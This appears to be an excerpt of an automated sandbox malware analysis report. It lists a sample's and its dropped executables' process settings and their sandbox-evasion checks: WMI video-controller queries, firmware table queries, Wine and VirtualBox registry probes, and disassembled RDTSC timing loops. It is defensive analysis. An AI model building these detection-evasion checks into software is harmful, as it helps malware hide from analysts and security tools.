Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B1AD0 second address: 10B1ADC instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2CC8277E6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B1ADC second address: 10B1AE6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2CCE084FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10A4F68 second address: 10A4F8F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2CC8277E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD2CC8277F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10A4F8F second address: 10A4F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10A4F95 second address: 10A4F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B125B second address: 10B1275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007FD2CCE08500h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B42AC second address: 10B42F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov dx, CE06h 0x0000000b push 00000000h 0x0000000d mov dx, 2768h 0x00000011 call 00007FD2CC8277E9h 0x00000016 ja 00007FD2CC8277FAh 0x0000001c jmp 00007FD2CC8277F4h 0x00000021 push eax 0x00000022 pushad 0x00000023 jnp 00007FD2CC8277E8h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jo 00007FD2CC8277E6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B42F2 second address: 10B4315 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FD2CCE08501h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B4315 second address: 10B4324 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B4324 second address: 10B436B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jnc 00007FD2CCE084F6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop eax 0x0000000f mov ch, ah 0x00000011 push 00000003h 0x00000013 jmp 00007FD2CCE084FCh 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D2F3Ah], esi 0x00000020 push 00000003h 0x00000022 mov edx, dword ptr [ebp+122D2A8Ah] 0x00000028 push 8BE12D41h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FD2CCE08501h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B436B second address: 10B43A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 341ED2BFh 0x00000010 mov edi, dword ptr [ebp+122D2D4Ah] 0x00000016 lea ebx, dword ptr [ebp+1244916Dh] 0x0000001c mov cl, A7h 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007FD2CC8277E6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B43A7 second address: 10B43B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD2CCE084F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B43B5 second address: 10B43C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FD2CC8277E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B4430 second address: 10B4435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B450A second address: 10B4558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FD2CC8277F9h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD2CC8277F9h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B4638 second address: 10B4642 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2CCE084F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B4642 second address: 10B4653 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10B4653 second address: 10B4658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10AA013 second address: 10AA018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10AA018 second address: 10AA04C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FD2CCE08502h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FD2CCE08508h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D1D73 second address: 10D1D84 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2CC8277ECh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D233A second address: 10D233E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D233E second address: 10D2344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D2748 second address: 10D2750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D28D6 second address: 10D28F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD2CC8277E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2CC8277F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D28F9 second address: 10D2916 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D2A62 second address: 10D2A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2CC8277F5h 0x00000009 jmp 00007FD2CC8277F2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D2A91 second address: 10D2AA3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD2CCE084F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D2AA3 second address: 10D2AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D2AA9 second address: 10D2AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D2AAD second address: 10D2AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D2AB1 second address: 10D2AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D360A second address: 10D3615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D3615 second address: 10D3630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jo 00007FD2CCE084F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D378C second address: 10D3792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D3792 second address: 10D3796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D3796 second address: 10D379A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D38E0 second address: 10D38E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D7C19 second address: 10D7C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CC8277F7h 0x00000009 jns 00007FD2CC8277E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10D7C3A second address: 10D7C43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10DC92A second address: 10DC92F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10DC92F second address: 10DC952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD2CCE08507h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
